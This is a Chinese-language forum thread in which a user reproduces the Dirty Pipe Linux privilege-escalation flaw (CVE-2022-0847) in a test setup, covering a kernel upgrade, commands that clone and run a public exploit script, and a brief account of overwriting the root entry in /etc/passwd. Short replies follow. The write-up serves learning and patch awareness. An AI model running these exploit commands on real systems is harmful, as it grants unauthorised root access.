执念e1 发表于 2022-4-15 13:30:56

Dirty Pipe提权漏洞复现

**环境准备**
一开始在环境准备上花费了挺多时间,安装了多个linux版本镜像,找了很久没找到高版本的内核,比较低的版本又无法完成升级。

本提权漏洞要求内核是5.8以上的才能利用,想要复现漏洞需要安装高版本内核。

最终只能自己手动去升级内核。

本次试用的kail测试环境,最开始5.4版本,用如下方法可以进行升级。

***

**具体升级**



从如下网址下载需要升级的内核版本
[https://kernel.ubuntu.com/~kernel-ppa/mainline/v5.8.5/amd64/](https://kernel.ubuntu.com/~kernel-ppa/mainline/v5.8.5/amd64/)
![图片.png](data/attachment/forum/202204/15/132711ufwa9haflmdgjhfd.png)
下载两个文件到本地后,使用如下命令进行内核升级
![图片.png](data/attachment/forum/202204/15/132749qp2lqanjawf9l4db.png)
安装成功后,更新grub系统引导并重启

`update-grub `
` reboot`
再使用uname -a查看内核版本就已经是5.8.5了
![图片.png](data/attachment/forum/202204/15/132847p00rt2lytblo1bel.png)
至此,已经完成内核升级,有了环境。

中间使用了gcc来编译提权源码,因此还需要安装gcc。

然后再测试Dirty Pipe
`git clone https://github.com/imfiver/CVE-2022-0847.git`
`cd CVE-2022-0847`
`chmod +x Dirty-Pipe.sh`
`bash Dirty-Pipe.sh`
![图片.png](data/attachment/forum/202204/15/133003vaj9a87x23zg8jg3.png)
漏洞影响版本:影响版本:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102


***

**具体漏洞原理**



覆盖/etc/passwd的root用户信息。

具体是通过覆盖r后面的5个字节,为了将x替换为空,相当于置空了密码,这样su无需密码可直接提权至root权限 Twitter上有放出更加简易的POC。

执念e1 发表于 2022-4-15 13:34:55

说实话,比起敲键盘来说还是截图方便( ̄▽ ̄)~*

王一之 发表于 2022-4-15 13:42:41

厉害了 哥哥是搞安全的吗?

最近论坛和博客爆出不少漏洞。。。。被日麻了,连续几天在补了

执念e1 发表于 2022-4-15 14:08:48

哈哈哈,有点涉猎,上个月不是欧美各大公司都被爆破了,流出来好多东西,赶紧来复习一下

执念e1 发表于 2022-4-15 14:09:02

王一之 发表于 2022-4-15 13:42
厉害了 哥哥是搞安全的吗?

最近论坛和博客爆出不少漏洞。。。。被日麻了,连续几天在补了 ...

哈哈哈,有点涉猎,上个月不是欧美各大公司都被爆破了,流出来好多东西,赶紧来复习一下

李恒道 发表于 2022-4-15 14:34:24

哥哥竟然还是大黑阔

执念e1 发表于 2022-4-15 17:50:36

李恒道 发表于 2022-4-15 14:34
哥哥竟然还是大黑阔

{:4_115:}我进去起码有你一半功劳{:4_115:}{:4_115:}
页: [1]
查看完整版本: Dirty Pipe提权漏洞复现